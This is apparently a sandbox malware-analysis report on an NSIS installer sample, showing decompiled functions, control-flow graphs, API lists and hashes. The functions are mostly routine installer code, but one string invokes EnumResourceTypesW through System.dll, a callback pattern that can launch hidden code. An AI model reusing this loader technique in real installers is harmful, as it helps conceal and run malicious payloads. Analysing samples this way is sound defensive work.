                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\fjerbregners_patrol.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                                                                                            • API String ID: 2803837635-554311578
                                                                                                                                                                                            • Opcode ID: b2e24f64e15c6d5933ba4dec3c6f96b794a3a68e1521bfe682e25a871f208e5d
                                                                                                                                                                                            • Instruction ID: de769da964f975e50ef5f9da2c7d7eac8213b1703c1877306bfd3b749b747a74
                                                                                                                                                                                            • Opcode Fuzzy Hash: b2e24f64e15c6d5933ba4dec3c6f96b794a3a68e1521bfe682e25a871f208e5d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 88612631600300ABD721DF25ED85B1A7BA8EB80719F50453FFA41B72D1CB7C9A458BAE
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00405D47 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 222stringCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 870 405d47-405d50 871 405d52-405d61 870->871 872 405d63-405d7a 870->872 871->872 873 405d7c-405d85 872->873 874 405d8f-405d92 872->874 873->874 877 405d87-405d8b 873->877 875 405fb2-405fb7 874->875 876 405d98-405d99 874->876 879 405fc2 875->879 880 405fb9-405fc0 call 40690a 875->880 878 405d9a-405da9 876->878 877->874 882 405fac-405fb1 878->882 883 405daf-405db4 878->883 884 405fc4-405fc9 879->884 880->884 882->875 886 405f88 883->886 887 405dba-405df6 883->887 890 405f95-405f9a 886->890 891 405f8a-405f90 886->891 888 405f34-405f37 887->888 889 405dfc-405e03 887->889 894 405f39-405f3c 888->894 895 405f6d-405f70 888->895 892 405e21-405e23 889->892 893 405e05-405e11 889->893 897 405f9b-405fa6 890->897 896 405f92-405f93 891->896 901 405e24-405e3a 892->901 893->892 900 405e13-405e16 893->900 902 405f4c-405f63 call 40690a 894->902 903 405f3e-405f4a call 406408 894->903 898 405f72-405f76 call 405d47 895->898 899 405f7b-405f86 lstrlenA 895->899 896->897 897->878 897->882 898->899 899->896 900->892 905 405e18-405e1b 900->905 906 405e71-405e74 901->906 907 405e3c-405e57 call 406776 901->907 902->899 916 405f65-405f6b call 406aed 902->916 903->899 905->892 913 405e1d-405e1f 905->913 911 405e76-405e82 GetSystemDirectoryA 906->911 912 405e87-405e8a 906->912 920 405e5c-405e5f 907->920 917 405f12-405f15 911->917 918 405e9a-405eb6 912->918 919 405e8c-405e98 GetWindowsDirectoryA 912->919 913->901 916->899 922 405f17-405f1a 917->922 923 405f28-405f32 call 406aed 917->923 924 405eb8-405eba 918->924 925 405ece-405eec call 4066e5 918->925 919->917 920->922 926 405e65-405e6c call 405d47 920->926 922->923 929 405f1c-405f22 lstrcatA 922->929 923->899 924->925 931 405ebc-405ec2 924->931 939 405f03-405f0c 925->939 940 405eee-405f01 SHGetPathFromIDListA CoTaskMemFree 925->940 926->917 929->923 936 405eca-405ecc 931->936 936->925 937 405f0e 936->937 937->917 939->918 939->937 940->937 940->939
                                                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                                                            			E00405D47() {
				signed int _t27;
				CHAR* _t28;
				void* _t49;
				signed int _t50;
				signed int _t51;
				intOrPtr* _t52;
				CHAR* _t55;
				CHAR* _t58;
				CHAR* _t70;
				signed int _t72;
				CHAR* _t73;
				char* _t75;
				signed int _t76;
				CHAR* _t77;
				intOrPtr _t81;
				CHAR* _t83;
				char _t84;
				CHAR* _t86;
				CHAR* _t88;
				signed int _t95;
				signed int _t98;
				char* _t101;
				void* _t103;
				signed int _t104;
				void* _t105;

				_t27 =  *(_t105 + 8);
				if(_t27 < 0) {
					_t81 =  *0x4237e0; // 0x5527aa
					_t27 =  *(_t81 - 4 + _t27 * 4);
				}
				_t83 = 0x422fa0;
				_t70 =  *(_t105 + 0x24);
				_t75 =  *0x424038 + _t27;
				_t88 = 0x422fa0;
				if(_t70 >= 0x422fa0 && _t70 - 0x422fa0 < 0x800) {
					_t88 = _t70;
					_t70 = 0;
					 *(_t105 + 0x28) = 0;
				}
				if( *_t75 == 0) {
					L48:
					 *_t88 = 0;
					if(_t70 == 0) {
						_t28 = _t83;
					} else {
						_t28 = E0040690A(_t70, _t83);
					}
					return _t28;
				} else {
					while(1) {
						_t101 = _t75;
						 *((intOrPtr*)(_t105 + 0x18)) = _t101;
						if(_t88 - _t83 >= 0x400) {
							break;
						}
						_t84 =  *_t75;
						if(_t84 >= 4) {
							if(__eflags != 0) {
								 *_t88 = _t84;
								_t88 =  &(_t88[1]);
								__eflags = 1;
								L46:
								_t75 = 1 + _t101;
								_t83 = 0x422fa0;
								if( *_t75 != 0) {
									continue;
								}
								break;
							}
							 *_t88 =  *((intOrPtr*)(_t75 + 1));
							_t88 =  &(_t88[1]);
							__eflags = _t88;
							_push(2);
							L44:
							_pop(1);
							goto L46;
						}
						_t72 =  *((char*)(_t101 + 2));
						_t76 =  *((char*)(_t75 + 1));
						 *(_t105 + 0x14) = _t72;
						 *(_t105 + 0x20) = _t76;
						_t95 = (_t72 & 0x0000007f) << 0x00000007 | _t76 & 0x0000007f;
						 *(_t105 + 0x28) = _t72;
						 *(_t105 + 0x1c) = _t76 | 0x00008000;
						 *(_t105 + 0x24) = _t72 | 0x00008000;
						if(_t84 != 2) {
							__eflags = _t84 - 3;
							if(_t84 != 3) {
								__eflags = _t84 - 1;
								if(__eflags == 0) {
									_push( !_t95);
									_push(_t88);
									E00405D47();
								}
							} else {
								__eflags = _t95 - 0x1d;
								if(__eflags != 0) {
									E0040690A(_t88, "kernel32::EnumResourceTypesW(i 0,i r1,i 0)" + (_t95 << 0xa));
									__eflags = _t95 - 0x15 - 7;
									if(__eflags < 0) {
										E00406AED(_t88);
									}
								} else {
									E00406408(_t88,  *0x4237f8);
								}
							}
							L41:
							_t88 =  &(_t88[lstrlenA(_t88)]);
							_push(3);
							goto L44;
						}
						if( *0x4240fc != 0 ||  *0x4240fe >= 0x45a || _t72 == 0x23 || _t72 == 0x2e) {
							_t86 = 1;
							__eflags = 1;
						} else {
							_t86 = 0;
						}
						_t103 = 2;
						_t49 = 4;
						_t104 =  !=  ? _t49 : _t103;
						 *(_t105 + 0x34) = _t86;
						_t120 = _t76;
						if(_t76 >= 0) {
							__eflags = _t76 - 0x25;
							if(_t76 != 0x25) {
								__eflags = _t76 - 0x24;
								if(_t76 != 0x24) {
									do {
										_t50 =  *(_t105 + 0x18 + _t104 * 4);
										_t104 = _t104 - 1;
										_t77 =  *0x4237f0; // 0x70251370
										_t51 = _t50 & 0xffffffbf;
										 *(_t105 + 0x10) = _t51;
										_t98 = _t51 & 0x00008000;
										__eflags = _t77;
										if(_t77 == 0) {
											L26:
											_t52 = E004066E5(7);
											_t55 =  *_t52( *0x4237f8,  *(_t105 + 0x10) & 0x000000ff, _t98);
											_t73 = _t55;
											__eflags = _t73;
											if(_t73 == 0) {
												goto L28;
											}
											__imp__SHGetPathFromIDListA(_t73, _t88);
											__imp__CoTaskMemFree(_t73);
											__eflags = _t55;
											if(_t55 != 0) {
												break;
											}
											goto L28;
										}
										__eflags = _t86;
										if(_t86 == 0) {
											goto L26;
										}
										_t58 =  *_t77( *0x4237f8, _t51, 0, 0, _t88); // executed
										__eflags = _t58;
										if(_t58 == 0) {
											break;
										}
										goto L26;
										L28:
										_t86 =  *(_t105 + 0x34);
										 *_t88 = 0;
										__eflags = _t104;
									} while (_t104 != 0);
									_t72 =  *(_t105 + 0x14);
									goto L30;
								}
								GetWindowsDirectoryA(_t88, 0x400);
								goto L30;
							}
							GetSystemDirectoryA(_t88, 0x400);
							goto L30;
						} else {
							E00406776((_t76 & 0x0000003f) +  *0x424038, _t120, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t76 & 0x0000003f) +  *0x424038, _t88, _t76 & 0x00000040); // executed
							if( *_t88 != 0) {
								L31:
								if(_t72 == 0x1a) {
									lstrcatA(_t88, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							} else {
								_push(_t72);
								_push(_t88);
								E00405D47();
								L30:
								if( *_t88 == 0) {
									L33:
									E00406AED(_t88);
									_t101 =  *((intOrPtr*)(_t105 + 0x18));
									goto L41;
								}
								goto L31;
							}
						}
					}
					_t70 =  *(_t105 + 0x30);
					goto L48;
				}
			}




























                                                                                                                                                                                            0x00405d47
                                                                                                                                                                                            0x00405d50
                                                                                                                                                                                            0x00405d52
                                                                                                                                                                                            0x00405d61
                                                                                                                                                                                            0x00405d61
                                                                                                                                                                                            0x00405d69
                                                                                                                                                                                            0x00405d6f
                                                                                                                                                                                            0x00405d73
                                                                                                                                                                                            0x00405d76
                                                                                                                                                                                            0x00405d7a
                                                                                                                                                                                            0x00405d87
                                                                                                                                                                                            0x00405d89
                                                                                                                                                                                            0x00405d8b
                                                                                                                                                                                            0x00405d8b
                                                                                                                                                                                            0x00405d92
                                                                                                                                                                                            0x00405fb2
                                                                                                                                                                                            0x00405fb2
                                                                                                                                                                                            0x00405fb7
                                                                                                                                                                                            0x00405fc2
                                                                                                                                                                                            0x00405fb9
                                                                                                                                                                                            0x00405fbb
                                                                                                                                                                                            0x00405fbb
                                                                                                                                                                                            0x00405fc9
                                                                                                                                                                                            0x00405d98
                                                                                                                                                                                            0x00405d9a
                                                                                                                                                                                            0x00405d9c
                                                                                                                                                                                            0x00405da0
                                                                                                                                                                                            0x00405da9
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405daf
                                                                                                                                                                                            0x00405db4
                                                                                                                                                                                            0x00405f88
                                                                                                                                                                                            0x00405f95
                                                                                                                                                                                            0x00405f99
                                                                                                                                                                                            0x00405f9a
                                                                                                                                                                                            0x00405f9b
                                                                                                                                                                                            0x00405f9b
                                                                                                                                                                                            0x00405f9e
                                                                                                                                                                                            0x00405fa6
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405fa6
                                                                                                                                                                                            0x00405f8d
                                                                                                                                                                                            0x00405f8f
                                                                                                                                                                                            0x00405f8f
                                                                                                                                                                                            0x00405f90
                                                                                                                                                                                            0x00405f92
                                                                                                                                                                                            0x00405f92
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405f92
                                                                                                                                                                                            0x00405dba
                                                                                                                                                                                            0x00405dbe
                                                                                                                                                                                            0x00405dc7
                                                                                                                                                                                            0x00405dd3
                                                                                                                                                                                            0x00405dd7
                                                                                                                                                                                            0x00405dd9
                                                                                                                                                                                            0x00405de4
                                                                                                                                                                                            0x00405def
                                                                                                                                                                                            0x00405df6
                                                                                                                                                                                            0x00405f34
                                                                                                                                                                                            0x00405f37
                                                                                                                                                                                            0x00405f6d
                                                                                                                                                                                            0x00405f70
                                                                                                                                                                                            0x00405f74
                                                                                                                                                                                            0x00405f75
                                                                                                                                                                                            0x00405f76
                                                                                                                                                                                            0x00405f76
                                                                                                                                                                                            0x00405f39
                                                                                                                                                                                            0x00405f39
                                                                                                                                                                                            0x00405f3c
                                                                                                                                                                                            0x00405f58
                                                                                                                                                                                            0x00405f60
                                                                                                                                                                                            0x00405f63
                                                                                                                                                                                            0x00405f66
                                                                                                                                                                                            0x00405f66
                                                                                                                                                                                            0x00405f3e
                                                                                                                                                                                            0x00405f45
                                                                                                                                                                                            0x00405f45
                                                                                                                                                                                            0x00405f3c
                                                                                                                                                                                            0x00405f7b
                                                                                                                                                                                            0x00405f82
                                                                                                                                                                                            0x00405f84
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405f84
                                                                                                                                                                                            0x00405e03
                                                                                                                                                                                            0x00405e23
                                                                                                                                                                                            0x00405e23
                                                                                                                                                                                            0x00405e1d
                                                                                                                                                                                            0x00405e1d
                                                                                                                                                                                            0x00405e1d
                                                                                                                                                                                            0x00405e2d
                                                                                                                                                                                            0x00405e30
                                                                                                                                                                                            0x00405e31
                                                                                                                                                                                            0x00405e34
                                                                                                                                                                                            0x00405e38
                                                                                                                                                                                            0x00405e3a
                                                                                                                                                                                            0x00405e71
                                                                                                                                                                                            0x00405e74
                                                                                                                                                                                            0x00405e87
                                                                                                                                                                                            0x00405e8a
                                                                                                                                                                                            0x00405e9a
                                                                                                                                                                                            0x00405e9a
                                                                                                                                                                                            0x00405e9e
                                                                                                                                                                                            0x00405e9f
                                                                                                                                                                                            0x00405ea5
                                                                                                                                                                                            0x00405eaa
                                                                                                                                                                                            0x00405eae
                                                                                                                                                                                            0x00405eb4
                                                                                                                                                                                            0x00405eb6
                                                                                                                                                                                            0x00405ece
                                                                                                                                                                                            0x00405ed0
                                                                                                                                                                                            0x00405ee6
                                                                                                                                                                                            0x00405ee8
                                                                                                                                                                                            0x00405eea
                                                                                                                                                                                            0x00405eec
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405ef0
                                                                                                                                                                                            0x00405ef9
                                                                                                                                                                                            0x00405eff
                                                                                                                                                                                            0x00405f01
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405f01
                                                                                                                                                                                            0x00405eb8
                                                                                                                                                                                            0x00405eba
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405ec8
                                                                                                                                                                                            0x00405eca
                                                                                                                                                                                            0x00405ecc
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405f03
                                                                                                                                                                                            0x00405f03
                                                                                                                                                                                            0x00405f07
                                                                                                                                                                                            0x00405f0a
                                                                                                                                                                                            0x00405f0a
                                                                                                                                                                                            0x00405f0e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405f0e
                                                                                                                                                                                            0x00405e92
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405e92
                                                                                                                                                                                            0x00405e7c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405e3c
                                                                                                                                                                                            0x00405e57
                                                                                                                                                                                            0x00405e5f
                                                                                                                                                                                            0x00405f17
                                                                                                                                                                                            0x00405f1a
                                                                                                                                                                                            0x00405f22
                                                                                                                                                                                            0x00405f22
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405e65
                                                                                                                                                                                            0x00405e65
                                                                                                                                                                                            0x00405e66
                                                                                                                                                                                            0x00405e67
                                                                                                                                                                                            0x00405f12
                                                                                                                                                                                            0x00405f15
                                                                                                                                                                                            0x00405f28
                                                                                                                                                                                            0x00405f29
                                                                                                                                                                                            0x00405f2e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405f2e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405f15
                                                                                                                                                                                            0x00405e5f
                                                                                                                                                                                            0x00405e3a
                                                                                                                                                                                            0x00405fac
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405fb1

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405E7C
                                                                                                                                                                                              • Part of subcall function 0040690A: lstrcpynA.KERNEL32(?,?,00000400,004037B2,Apteres Setup,NSIS Error), ref: 00406917
                                                                                                                                                                                              • Part of subcall function 00406AED: CharNextA.USER32(?,*?|<>/":,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403BE3,C:\Users\user\AppData\Local\Temp\,756D3410,004038B6), ref: 00406B54
                                                                                                                                                                                              • Part of subcall function 00406AED: CharNextA.USER32(?,?,?,00000000,?,00403BE3,C:\Users\user\AppData\Local\Temp\,756D3410,004038B6), ref: 00406B61
                                                                                                                                                                                              • Part of subcall function 00406AED: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403BE3,C:\Users\user\AppData\Local\Temp\,756D3410,004038B6), ref: 00406B66
                                                                                                                                                                                              • Part of subcall function 00406AED: CharPrevA.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403BE3,C:\Users\user\AppData\Local\Temp\,756D3410,004038B6), ref: 00406B7D
                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,?,000203D0,?,00405BD7,Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,?,C:\Users\user\Desktop,?,00000000), ref: 00405E92
                                                                                                                                                                                            • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,00405BD7,Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,?,C:\Users\user\Desktop,?,00000000), ref: 00405F22
                                                                                                                                                                                            • lstrlenA.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,?,000203D0,?,00405BD7,Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,?,C:\Users\user\Desktop,?,00000000), ref: 00405F7C
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Char$Next$Directory$PrevSystemWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                            • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$kernel32::EnumResourceTypesW(i 0,i r1,i 0)
                                                                                                                                                                                            • API String ID: 4187626192-841363495
                                                                                                                                                                                            • Opcode ID: 56c32fd2b5a89b80c8821ac6cce40d92068162025c5cfc8080d2aa243d4368bf
                                                                                                                                                                                            • Instruction ID: b55637f8a75946208fb5e34ad3c9bf4d073c14fba67655a7cca38dca7f7ecdcc
                                                                                                                                                                                            • Opcode Fuzzy Hash: 56c32fd2b5a89b80c8821ac6cce40d92068162025c5cfc8080d2aa243d4368bf
                                                                                                                                                                                            • Instruction Fuzzy Hash: CA611171604B02ABEB249B24CD84B3B7AA9EB91304F64443FF581B62D1D63C89428F5E
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00405BA4 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76stringwindowCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1010 405ba4-405bb0 1011 405c82-405c86 1010->1011 1012 405bb6-405bcb 1010->1012 1013 405bd7-405be6 lstrlenA 1012->1013 1014 405bcd-405bd2 call 405d47 1012->1014 1016 405be8-405bf5 lstrlenA 1013->1016 1017 405c09 1013->1017 1014->1013 1018 405bfb-405c07 lstrcatA 1016->1018 1019 405c7f-405c81 1016->1019 1020 405c0e-405c14 1017->1020 1018->1020 1019->1011 1021 405c16-405c23 SetWindowTextA 1020->1021 1022 405c27-405c29 1020->1022 1021->1022 1023 405c74-405c76 1022->1023 1024 405c2b-405c72 SendMessageA * 3 1022->1024 1023->1019 1025 405c78 1023->1025 1024->1023 1025->1019
                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                            			E00405BA4() {
				void* _t18;
				signed int _t19;
				int _t20;
				long _t21;
				long _t22;
				struct HWND__* _t32;
				signed int _t35;
				CHAR* _t38;
				CHAR* _t39;
				int _t44;
				void* _t46;

				_t32 =  *0x4237e8; // 0x203d0
				if(_t32 == 0) {
					return _t18;
				}
				_t19 =  *0x4240f4;
				 *(_t46 + 0xc) = _t19;
				_t35 = _t19 & 0x00000001;
				if(_t35 == 0) {
					_push( *((intOrPtr*)(_t46 + 0x50)));
					_push(0x420e10);
					E00405D47();
				}
				_t20 = lstrlenA(0x420e10);
				_t38 =  *(_t46 + 0x58);
				_t44 = _t20;
				if(_t38 == 0) {
					_t39 = 0x420e10;
					goto L7;
				} else {
					_t21 = lstrlenA(_t38) + _t44;
					if(_t21 >= 0x800) {
						L13:
						return _t21;
					}
					_t39 = 0x420e10;
					lstrcatA(0x420e10, _t38);
					L7:
					_t21 =  *(_t46 + 0x10);
					if((_t21 & 0x00000004) == 0) {
						SetWindowTextA( *0x4237c8, _t39); // executed
						_t21 =  *(_t46 + 0x10);
					}
					if((_t21 & 0x00000002) == 0) {
						 *(_t46 + 0x34) = _t39;
						 *((intOrPtr*)(_t46 + 0x24)) = 1;
						_t22 = SendMessageA(_t32, 0x1004, 0, 0); // executed
						 *(_t46 + 0x1c) =  *(_t46 + 0x1c) & 0x00000000;
						 *((intOrPtr*)(_t46 + 0x18)) = _t22 - _t35;
						SendMessageA(_t32, 0x1007 - _t35, 0, _t46 + 0x14); // executed
						_t21 = SendMessageA(_t32, 0x1013,  *(_t46 + 0x1c), 0); // executed
					}
					if(_t35 != 0) {
						0x420e10[_t44] = 0;
					}
					goto L13;
				}
			}














                                                                                                                                                                                            0x00405ba8
                                                                                                                                                                                            0x00405bb0
                                                                                                                                                                                            0x00405c86
                                                                                                                                                                                            0x00405c86
                                                                                                                                                                                            0x00405bb6
                                                                                                                                                                                            0x00405bbf
                                                                                                                                                                                            0x00405bc8
                                                                                                                                                                                            0x00405bcb
                                                                                                                                                                                            0x00405bcd
                                                                                                                                                                                            0x00405bd1
                                                                                                                                                                                            0x00405bd2
                                                                                                                                                                                            0x00405bd2
                                                                                                                                                                                            0x00405bd9
                                                                                                                                                                                            0x00405bde
                                                                                                                                                                                            0x00405be2
                                                                                                                                                                                            0x00405be6
                                                                                                                                                                                            0x00405c09
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405be8
                                                                                                                                                                                            0x00405bee
                                                                                                                                                                                            0x00405bf5
                                                                                                                                                                                            0x00405c7f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405c81
                                                                                                                                                                                            0x00405bfc
                                                                                                                                                                                            0x00405c02
                                                                                                                                                                                            0x00405c0e
                                                                                                                                                                                            0x00405c0e
                                                                                                                                                                                            0x00405c14
                                                                                                                                                                                            0x00405c1d
                                                                                                                                                                                            0x00405c23
                                                                                                                                                                                            0x00405c23
                                                                                                                                                                                            0x00405c29
                                                                                                                                                                                            0x00405c34
                                                                                                                                                                                            0x00405c3f
                                                                                                                                                                                            0x00405c47
                                                                                                                                                                                            0x00405c49
                                                                                                                                                                                            0x00405c50
                                                                                                                                                                                            0x00405c64
                                                                                                                                                                                            0x00405c72
                                                                                                                                                                                            0x00405c72
                                                                                                                                                                                            0x00405c76
                                                                                                                                                                                            0x00405c78
                                                                                                                                                                                            0x00405c78
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405c76

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,00000000,C:\Users\user\Desktop,?,00000000), ref: 00405BD9
                                                                                                                                                                                            • lstrlenA.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,00000000,C:\Users\user\Desktop,?,00000000), ref: 00405BE9
                                                                                                                                                                                            • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,00000000,C:\Users\user\Desktop,?,00000000), ref: 00405C02
                                                                                                                                                                                            • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll), ref: 00405C1D
                                                                                                                                                                                            • SendMessageA.USER32 ref: 00405C47
                                                                                                                                                                                            • SendMessageA.USER32(000203D0,00001007,00000000,?), ref: 00405C64
                                                                                                                                                                                            • SendMessageA.USER32(000203D0,00001013,00000000,00000000), ref: 00405C72
                                                                                                                                                                                              • Part of subcall function 00405D47: lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,00405BD7,Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,?,C:\Users\user\Desktop,?,00000000), ref: 00405F22
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: MessageSend$lstrcatlstrlen$TextWindow
                                                                                                                                                                                            • String ID: C:\Users\user\Desktop$Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll
                                                                                                                                                                                            • API String ID: 1759915248-3562305700
                                                                                                                                                                                            • Opcode ID: fb7d386be1e08a6e87814f50181b88dc5155c1e11ced7d52ee2b6b580282f675
                                                                                                                                                                                            • Instruction ID: 3732fb0231da650a03bb4d036721d300732a1796d80e92389fd6f2ea3c233e24
                                                                                                                                                                                            • Opcode Fuzzy Hash: fb7d386be1e08a6e87814f50181b88dc5155c1e11ced7d52ee2b6b580282f675
                                                                                                                                                                                            • Instruction Fuzzy Hash: 582123726047146BE3109F159D40F6BBBD8EF85710F01483FFA84B7282C6B99C058FA9
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0040220B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83libraryloaderCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1026 40220b-402218 1027 4022f4-4022f9 1026->1027 1028 40221e-40223b call 402e92 * 2 1026->1028 1029 402cfc 1027->1029 1037 40223d-402248 GetModuleHandleA 1028->1037 1038 40224e-40225c LoadLibraryExA 1028->1038 1032 402d00-402d12 1029->1032 1039 402262-40226d GetProcAddress 1037->1039 1040 40224a 1037->1040 1038->1039 1041 4022e8-4022ed 1038->1041 1042 4022b5-4022bb call 405ba4 1039->1042 1043 40226f-402277 1039->1043 1040->1038 1041->1027 1047 4022c0 1042->1047 1044 402295-4022b3 1043->1044 1045 402279-40228b call 405ba4 1043->1045 1044->1047 1045->1047 1056 40228d-402293 1045->1056 1049 4022c4-4022c8 1047->1049 1049->1032 1052 4022ce-4022d6 call 403c08 1049->1052 1052->1029 1057 4022dc-4022e3 FreeLibrary 1052->1057 1056->1049 1057->1029
                                                                                                                                                                                            C-Code - Quality: 60%
                                                                                                                                                                                            			E0040220B(void* __ebx, void* _a8, void* _a12, int _a16, void* _a36, void* _a40, intOrPtr _a48, CHAR* _a60, void* _a64, struct HINSTANCE__* _a68) {
				void* _v0;
				int _t16;

				_a16 = 1;
				if( *0x424060 < __ebx) {
					_push("C:\Users\Arthur\AppData\Local\Temp\nsm8742.tmp\System.dll");
					_push(0xffffffe7);
					goto L1;
				} else {
